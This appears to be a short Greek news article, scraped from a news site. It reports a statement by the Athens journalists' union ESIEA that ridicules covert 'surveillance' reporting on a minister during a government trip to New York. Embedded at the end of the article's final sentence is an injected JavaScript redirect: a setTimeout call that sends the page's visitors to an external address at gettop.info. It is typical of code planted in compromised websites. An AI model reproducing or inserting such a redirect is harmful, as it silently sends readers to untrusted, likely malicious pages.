ΕΣΗΕΑ: Μια τέτοια δημοσιογραφία το μόνο που διεκδικεί είναι το Χρυσό Βατόμουρο

0
8

 

Η ΕΣΗΕΑ με ανακοίνωσή της κάνει λόγο για αποπροσανατολισμό από τα σοβαρά ζητήματα με αφορμή την «παρακολούθηση» του υπουργού Επικρατείας.

Παράλληλα, κρούει τον κώδωνα του κινδύνου για τους τρόπους «με τους οποίους αλιεύονται και διοχετεύονται πληροφορίες και για την τεκμηρίωσή τους που ουδεμία σχέση έχουν με τον έλεγχο της εξουσίας».

«Θα μπορούσε να είναι αστείο, αλλά δυστυχώς είναι τραγικό», αναφέρει σε σχετική ανακοίνωση και υπογραμμίζει ότι η μόνη εικόνα μέχρι στιγμής από την κυβερνητική αποστολή στη Νέα Υόρκη είναι ένα φτηνό περιστατικό, που αποπροσανατολίζει από τα σοβαρά ζητήματα.

«Μια τέτοια… «δημοσιογραφία» πίσω από περούκες, μαύρα γυαλιά και όλα τα υπόλοιπα το μόνο που μπορεί να διεκδικήσει είναι το «Χρυσό Βατόμουρο» του ρεπορτάζ. Είναι μια πρακτική που δεν προωθεί τον αγώνα για πολυφωνία στο χώρο των ΜΜΕ, υπονομεύει τη δεοντολογία και οι δημοσιογράφοι την απορρίπτουν»

Κλείνοντας η Ενωση τονίζει ότι «η είδηση είναι πολύ σοβαρή υπόθεση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here